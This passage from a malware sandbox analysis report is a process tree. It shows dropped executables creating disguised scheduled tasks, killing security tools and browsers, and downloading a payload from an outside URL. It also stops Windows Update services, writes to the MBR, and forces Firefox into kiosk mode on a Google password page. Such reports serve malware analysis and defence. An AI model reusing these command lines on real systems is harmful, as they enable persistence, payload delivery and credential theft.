                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2072,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:8
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2440
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2908,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=2916 /prefetch:1
                                                                                                                                                          6⤵
                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:1500
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3040,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=3060 /prefetch:1
                                                                                                                                                          6⤵
                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:4804
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3136
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3668
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2492
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3416
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4660
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:5272
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3574.tmp.bat""
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5176
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout 3
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:5392
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Discord.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Discord.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3696
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\ASUFER.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\ASUFER.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:6056
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\windows\ehome\SER.bat" "
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5444
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im ipz.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:2708
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im ipz2.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:4596
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im nvidsrv.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:3508
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im safesurf.exe /T
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:3668
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im surfguard.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:4616
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4440
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5132
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4188
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2760
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3308
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5552
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2756
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4244
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:5972
                                                                                                                                                      • C:\Windows\SysWOW64\subin.exe
                                                                                                                                                        subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3140
                                                                                                                                                      • C:\Windows\SysWOW64\subin.exe
                                                                                                                                                        subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5868
                                                                                                                                                      • C:\Windows\SysWOW64\subin.exe
                                                                                                                                                        subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6140
                                                                                                                                                      • C:\windows\ehome\sc.exe
                                                                                                                                                        sc stop xStarter
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5440
                                                                                                                                                      • C:\Windows\SysWOW64\subin.exe
                                                                                                                                                        subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1948
                                                                                                                                                      • C:\windows\ehome\wmild.exe
                                                                                                                                                        wmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:5104
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3700
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:2292
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /F /IM firefox.exe /T
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:4532
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /F /IM chrome.exe /T
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:5072
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /F /IM msedge.exe /T
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:5872
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /F /IM opera.exe /T
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:3992
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /F /IM brave.exe /T
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2216
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5828
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                          5⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:4956
                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2060 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1416 -prefsLen 21257 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba54894a-8bbd-446f-9d05-7c5ecfcff001} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" gpu
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5608
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 21257 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2643bc77-b219-4d4f-9ada-0312100c2828} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" socket
                                                                                                                                                              6⤵
                                                                                                                                                                PID:384
                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3340 -childID 1 -isForBrowser -prefsHandle 3304 -prefMapHandle 3300 -prefsLen 22482 -prefMapSize 243020 -jsInitHandle 1352 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a333c28-4786-4dc1-a763-0ff435585b85} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:2812
                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3732 -childID 2 -isForBrowser -prefsHandle 3736 -prefMapHandle 3764 -prefsLen 23287 -prefMapSize 243020 -jsInitHandle 1352 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4695f121-854c-4903-88dc-e5f4cae335cb} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4672
                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3780 -childID 3 -isForBrowser -prefsHandle 3740 -prefMapHandle 3760 -prefsLen 22795 -prefMapSize 243020 -jsInitHandle 1352 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a2ba912-8e9c-440d-afcc-9ab002628d18} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:3584
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Writes to the Master Boot Record (MBR)
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:380
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\1.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5592
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3384
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5200
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5464
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Bahjq47pKX.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Bahjq47pKX.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5524
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\LNpItppmFh.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\LNpItppmFh.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3860
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 252
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:3312
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1652
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4724
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                              2⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:5952
                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                              C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5604
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                2⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:2628
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1888
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:2924
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:4088
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:5672
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop bits
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:5908
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:5880
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Power Settings
                                                                                                                                                                  PID:5996
                                                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                                                    powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Power Settings
                                                                                                                                                                    PID:1180
                                                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                                                    powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Power Settings
                                                                                                                                                                    PID:5728
                                                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                                                    powercfg /x -standby-timeout-ac 0
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Power Settings
                                                                                                                                                                    PID:712
                                                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                                                    powercfg /x -standby-timeout-dc 0
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Power Settings
                                                                                                                                                                    PID:5756
                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                  C:\Windows\System32\conhost.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6008
                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                    C:\Windows\System32\conhost.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5688
                                                                                                                                                                    • C:\Windows\System32\dwm.exe
                                                                                                                                                                      C:\Windows\System32\dwm.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4256
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3576 -ip 3576
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3476
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6088
                                                                                                                                                                        • C:\Windows\system32\printfilterpipelinesvc.exe
                                                                                                                                                                          C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          PID:4908
                                                                                                                                                                          • C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                            /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{AD002E75-E7C0-4F27-8BCD-91D411BE8772}.xps" 133761023747160000
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:4644
                                                                                                                                                                        • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                          "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:4756
                                                                                                                                                                        • C:\Program Files\Microsoft Office\root\integration\integrator.exe
                                                                                                                                                                          integrator.exe /R /Msi MsiName="SPPRedist.msi,SPPRedist64.msi" PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:2488
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:3784
                                                                                                                                                                          • \??\c:\Windows\System32\MsiExec.exe
                                                                                                                                                                            c:\Windows\System32\MsiExec.exe -Embedding 2DE056E310262BA8F14718294D3D9BC5 E Global\MSI0000
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:2188
                                                                                                                                                                        • C:\Program Files\Microsoft Office\root\integration\integrator.exe
                                                                                                                                                                          integrator.exe /R /License PRIDName=ProPlusRetail.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:5900
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
